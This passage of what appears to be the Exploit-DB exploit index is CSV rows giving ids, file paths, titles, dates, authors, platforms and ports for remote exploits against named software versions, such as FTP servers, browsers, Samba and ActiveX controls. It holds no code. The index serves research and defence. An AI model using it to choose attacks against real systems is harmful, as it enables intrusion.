Saeed",windows,remote, -9690,exploits/windows/remote/9690.py,"BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660 -9694,exploits/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote, -9704,exploits/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote, -9705,exploits/windows/remote/9705.html,"Quiksoft EasyMail 6 - 'AddAttachment' Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote, -9718,exploits/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal",2009-09-18,Stack,multiple,remote, -9800,exploits/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 -9802,exploits/windows/remote/9802.html,"IBM Installation Manager 1.3.0 - 'iim://' URI handler",2009-09-29,bruiser,windows,remote, -9803,exploits/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow",2009-09-29,pyrokinesis,windows,remote, -9805,exploits/windows/remote/9805.html,"Oracle - Document Capture BlackIce DEVMODE",2009-09-29,pyrokinesis,windows,remote, -9810,exploits/windows/remote/9810.txt,"EnjoySAP 6.4/7.1 - File Overwrite",2009-09-28,sh2kerr,windows,remote, -9813,exploits/windows/remote/9813.txt,"Mereo Web Server 1.8 - Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 -9816,exploits/windows/remote/9816.py,"VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote, -9829,exploits/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 -9843,exploits/multiple/remote/9843.txt,"Blender 2.34/2.35a/2.4/2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote, -9851,exploits/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - '.m3u' Remote Buffer Overflow (1)",2009-11-03,corelanc0d3r,windows,remote, -9853,exploits/windows/remote/9853.rb,"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",windows,remote, -9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",hardware,remote,8022 -9862,exploits/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote, -9886,exploits/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",windows,remote, -9893,exploits/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)",2009-10-15,Skylined,windows,remote,80 -9896,exploits/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,windows,remote,80 -9900,exploits/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote, -9902,exploits/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Remote Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80 -9905,exploits/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 -9913,exploits/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 -9914,exploits/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 -9915,exploits/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 -9917,exploits/solaris/remote/9917.rb,"Solaris TelnetD - 'TTYPROMPT' Remote Buffer Overflow (1) (Metasploit)",2002-01-18,MC,solaris,remote,23 -9918,exploits/solaris/remote/9918.rb,"Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 -9920,exploits/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Remote Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111 -9921,exploits/solaris/remote/9921.rb,"Solaris 8.0 LPD - Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 -9923,exploits/solaris/remote/9923.rb,"Solaris 8 dtspcd - Remote Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 -9924,exploits/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 -9925,exploits/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,Metasploit,osx,remote, -9927,exploits/osx/remote/9927.rb,"mDNSResponder 10.4.0/10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,Metasploit,osx,remote, -9928,exploits/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21 -9929,exploits/osx/remote/9929.rb,"Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 -9930,exploits/osx/remote/9930.rb,"Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",osx,remote, -9931,exploits/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 -9932,exploits/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote, -9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote, -9935,exploits/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 -9936,exploits/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 -9937,exploits/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote, -9939,exploits/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote, -9940,exploits/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Remote Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 -9941,exploits/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit)",2004-10-21,patrick,multiple,remote, -9942,exploits/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",multiple,remote,5555 -9943,exploits/multiple/remote/9943.rb,"Apple QuickTime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote, -9944,exploits/multiple/remote/9944.rb,"Opera 9.50/9.61 historysearch - Command Execution (Metasploit)",2008-10-23,egypt,multiple,remote, -9945,exploits/multiple/remote/9945.rb,"Opera 9.10 - Configuration Overwrite (Metasploit)",2007-03-05,egypt,multiple,remote, -9946,exploits/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)",2006-07-25,"H D Moore",multiple,remote, -9947,exploits/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote, -9948,exploits/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization (Metasploit)",2008-12-03,sf,multiple,remote, -9949,exploits/multiple/remote/9949.rb,"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",multiple,remote, -9950,exploits/linux/remote/9950.rb,"Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote, -9951,exploits/multiple/remote/9951.rb,"Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 -9952,exploits/linux/remote/9952.rb,"PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 -9953,exploits/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 -9954,exploits/linux/remote/9954.rb,"Borland Interbase 2007 - 'PWD_db_aliased' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -9957,exploits/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - Remote Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,remote, -9966,exploits/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 -33433,exploits/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX",2014-05-19,metacom,windows,remote, -9992,exploits/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote, -9993,exploits/multiple/remote/9993.txt,"Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote, -9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote, -9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote, -9997,exploits/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote, -9998,exploits/windows/remote/9998.c,"BulletProof FTP Client 2.63 b56 - '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 -10000,exploits/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,hardware,remote, -10001,exploits/multiple/remote/10001.txt,"CUPS - 'kerberos' Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 -10007,exploits/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote, -10011,exploits/hardware/remote/10011.txt,"HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 -10019,exploits/linux/remote/10019.rb,"Borland Interbase 2007/2007 SP2 - 'open_marker_file' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10020,exploits/linux/remote/10020.rb,"Borland Interbase 2007/2007 SP2 - 'jrd8_create_database' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10021,exploits/linux/remote/10021.rb,"Borland Interbase 2007/2007 SP2 - 'INET_connect' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10023,exploits/linux/remote/10023.rb,"Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525 -10024,exploits/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote, -10025,exploits/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 -10026,exploits/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)",2005-10-18,"KaiJern Lau",linux,remote,9080 -10027,exploits/linux/remote/10027.rb,"PeerCast 0.1216 - Remote Stack Overflow (Metasploit)",2006-03-08,MC,linux,remote,7144 -10028,exploits/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Remote Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 -10029,exploits/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 -10030,exploits/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 -10032,exploits/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit)",2004-07-18,onetwo,linux,remote,7787 -10033,exploits/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",irix,remote,515 -10034,exploits/hp-ux/remote/10034.rb,"HP-UX LPD 10.20/11.00/11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",hp-ux,remote,515 -10035,exploits/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - 'report()' Remote Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 -10036,exploits/solaris/remote/10036.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote, -10037,exploits/cgi/remote/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,remote, -10047,exploits/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80 -10053,exploits/windows/remote/10053.txt,"httpdx 1.4 - GET Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 -10054,exploits/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Remote Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote, -10055,exploits/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80 -10056,exploits/windows/remote/10056.py,"Ada Image Server 0.6.7 - 'imgsrv.exe' Remote Buffer Overflow",2009-10-07,blake,windows,remote,1235 -10070,exploits/windows/remote/10070.php,"IBM Informix Client SDK 3.0 - '.nfx' File Integer Overflow",2009-10-05,bruiser,windows,remote, -10071,exploits/multiple/remote/10071.txt,"Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass",2009-11-10,"Dan Kaminsky",multiple,remote, -10079,exploits/windows/remote/10079.txt,"Google Apps - mailto URI handler cross-browser Remote command Execution",2009-10-01,pyrokinesis,windows,remote, -33431,exploits/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX",2014-05-19,metacom,windows,remote, -33432,exploits/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX",2014-05-19,metacom,windows,remote, -10081,exploits/hardware/remote/10081.txt,"Palm Pre WebOS 1.1 - Remote File Access",2009-10-05,"Townsend Ladd Harris",hardware,remote, -10083,exploits/php/remote/10083.txt,"PHP 5.3 - 'preg_match()' Full Path Disclosure",2009-09-27,"David Vieira-Kurz",php,remote, -10086,exploits/multiple/remote/10086.txt,"WebKit - 'Document()' Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote, -10093,exploits/multiple/remote/10093.txt,"Adobe Shockwave Player 11.5.1.601 - Multiple Code Executions",2009-11-04,"Francis Provencher",multiple,remote, -10095,exploits/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String / Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote, -10097,exploits/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote, -10098,exploits/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote, -10099,exploits/windows/remote/10099.py,"Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow",2009-11-16,ryujin,windows,remote,80 -10162,exploits/windows/remote/10162.py,"Home FTP Server - 'MKD' Directory Traversal",2009-11-17,zhangmc,windows,remote,21 -10235,exploits/windows/remote/10235.py,"Eureka Email Client - Remote Buffer Overflow",2009-11-26,"Dr_IDE & dookie",windows,remote, -10258,exploits/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion",2009-12-01,sharpe,windows,remote,21 -10269,exploits/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote, -10282,exploits/linux/remote/10282.py,"OrzHTTPd - Format String",2009-12-03,"Patroklos Argyroudis",linux,remote,80 -10340,exploits/windows/remote/10340.pl,"Symantec (Multiple Products) - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote, -10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",hardware,remote, -10365,exploits/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,remote, -10375,exploits/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,windows,remote, -10380,exploits/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz & sp3x",windows,remote, -10394,exploits/windows/remote/10394.py,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r & muts",windows,remote,80 -10434,exploits/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,windows,remote,80 -10451,exploits/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote, -10510,exploits/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote, -10542,exploits/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,windows,remote,69 -10579,exploits/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote, -10610,exploits/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote, -14257,exploits/windows/remote/14257.py,"Hero DVD Remote 1.0 - Remote Buffer Overflow",2010-07-07,chap0,windows,remote, -10715,exploits/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Remote Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 -10765,exploits/windows/remote/10765.py,"BigAnt Server 2.52 - Remote Overflow (SEH)",2009-12-29,Lincoln,windows,remote,6660 -10791,exploits/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities",2009-12-30,emgent,windows,remote,80 -10911,exploits/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,windows,remote, -10973,exploits/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote, -10980,exploits/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,linux,remote, -11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",novell,remote, -11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote, -11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",windows,remote, -11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,windows,remote, -11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",windows,remote, -11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora",2010-01-17,"Ahmed Obied",windows,remote, -11172,exploits/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote, -11173,exploits/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote, -11179,exploits/windows/remote/11179.rb,"EFS Software Easy Chat Server 2.2 - Remote Buffer Overflow",2010-01-18,"John Babio",windows,remote, -11203,exploits/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",multiple,remote, -11204,exploits/windows/remote/11204.html,"AOL 9.5 - ActiveX Heap Spray",2010-01-20,Dz_attacker,windows,remote, -11210,exploits/windows/remote/11210.rb,"EFS Easy Chat Server - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-21,fb1h2s,windows,remote, -11220,exploits/windows/remote/11220.py,"IntelliTamper 2.07/2.08 - Remote Buffer Overflow (SEH)",2010-01-22,loneferret,windows,remote, -11257,exploits/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Remote Buffer Overflow (Metasploit)",2010-01-25,Trancer,windows,remote, -11272,exploits/windows/remote/11272.py,"CamShot 1.2 - Overwrite (SEH)",2010-01-27,tecnik,windows,remote, -11293,exploits/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote Buffer Overflow",2010-01-30,Dz_attacker,windows,remote, -11328,exploits/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote, -11420,exploits/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Overflow",2010-02-12,Lincoln,windows,remote, -11422,exploits/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote, -11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",windows,remote, -11457,exploits/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add)",2010-02-15,"Sioma Labs",windows,remote, -11468,exploits/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)",2010-02-15,dookie,windows,remote,21 -11497,exploits/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote, -11500,exploits/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - 'HTTP' Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote, -11539,exploits/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote, -11615,exploits/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote, -11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",windows,remote, -11650,exploits/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM",2010-03-07,"Brett Gervasoni",windows,remote, -11661,exploits/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray",2010-03-09,"Alexey Sintsov",windows,remote, -11662,exploits/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote, -11668,exploits/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote, -11683,exploits/windows/remote/11683.rb,"Microsoft Internet Explorer - 'iepeers.dll' Use-After-Free (Metasploit)",2010-03-10,Trancer,windows,remote, -11694,exploits/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",windows,remote, -11720,exploits/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",linux,remote, -11742,exploits/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote, -11750,exploits/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow",2010-03-15,mr_me,windows,remote, -11765,exploits/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21 -11817,exploits/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,multiple,remote, -11820,exploits/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (1)",2010-03-20,corelanc0d3r,windows,remote, -11822,exploits/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote, -11856,exploits/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote, -11857,exploits/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",windows,remote, -11877,exploits/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (2)",2010-03-25,sud0,windows,remote,21 -11879,exploits/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote, -11886,exploits/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote, -11973,exploits/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote, -11974,exploits/windows/remote/11974.py,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow",2010-03-30,"S2 Crew",windows,remote, -11986,exploits/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution",2010-03-31,"Pierre Nogues",linux,remote, -12033,exploits/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting",2010-04-03,cp77fk4r,multiple,remote, -12044,exploits/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - 'MKD' Authenticated Remote Buffer Overflow",2010-04-04,x90c,windows,remote, -12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote, -12117,exploits/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote, -12119,exploits/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,windows,remote, -12122,exploits/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary Command-Line Injection",2010-04-09,"Ruben Santamarta",multiple,remote, -12152,exploits/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow",2010-04-11,zombiefx,windows,remote, -12156,exploits/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote, -12202,exploits/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry Buffer Overflow",2010-04-13,s4squatch,windows,remote, -12203,exploits/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,windows,remote, -12244,exploits/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,windows,remote, -12247,exploits/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetFileClose' Universal",2010-04-15,dookie,windows,remote, -12248,exploits/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetConnectionEnum' Universal",2010-04-15,dookie,windows,remote, -12250,exploits/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetShareEnum' Universal",2010-04-15,dookie,windows,remote, -12263,exploits/multiple/remote/12263.txt,"Apache OFBiz - Remote Execution (via SQL Execution) (PoC)",2010-04-16,"Lucas Apa",multiple,remote, -12264,exploits/multiple/remote/12264.txt,"Apache OFBiz - Admin Creator (PoC)",2010-04-16,"Lucas Apa",multiple,remote, -12265,exploits/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - 